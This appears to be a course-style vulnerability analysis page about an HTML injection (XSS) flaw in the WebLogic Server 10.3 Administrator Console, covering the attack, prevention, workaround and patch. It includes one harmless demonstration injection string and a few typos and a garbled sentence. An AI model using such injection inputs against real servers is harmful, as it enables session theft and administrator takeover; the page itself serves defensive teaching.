Information Assurance

Information Assurance

Bugtraq Analysis

ACROS Report

back to bugtraq analyses page

What the problem is

The Administrator Console in Orcle's WebLogic Server 10.3 was found to be susceptible to HTML injections that can grant the attacker administrator access. While in the Administrator Console, the administrator may click on a malicious URL link constructed by the attacker that requests private user data to be sent to the attacker's server. This data can be used to access administrator privileges on WebLogic Server.

What is an HTML injection? It is an attack through which the user provides malicious input to a web server, typically through a web browser, to access abilities on the server not intended for users. Having the user being able to input data to the server is a type of Cross-Site Scripting (XSS).

How does it work? The user can inject HTML or other script code in through input submitted by host forms (eg. search engines) or malicious URL construction. This can result in anything from remotely adding harmless HTML features to absconding with user cookies, which may contain private user data. In the textbox below, the input "<h4><font color=red>HTML Code Injected by User!</font></h4>," may act as an simple injection. Press submit to see what it would look like:

On a susceptible server, this injection can be further manipulated to gain access to web server functions and private data.

What could have prevented it

The URL argument could have been sanitized by the web server. Any HTML script within the submitted url needs to be blocked and reported

What can be done to work around it

This injection relies on the Administrator Console of the WebLogic Server. By disabling this, the vulnerability to administrator access is neutralized. Also, since the attack was done through a URL insertion, unidentified URLs can be while using the Administrator Console.

What can be done to prevent it from occurring in the future

Oracle has published a patch to fix this issue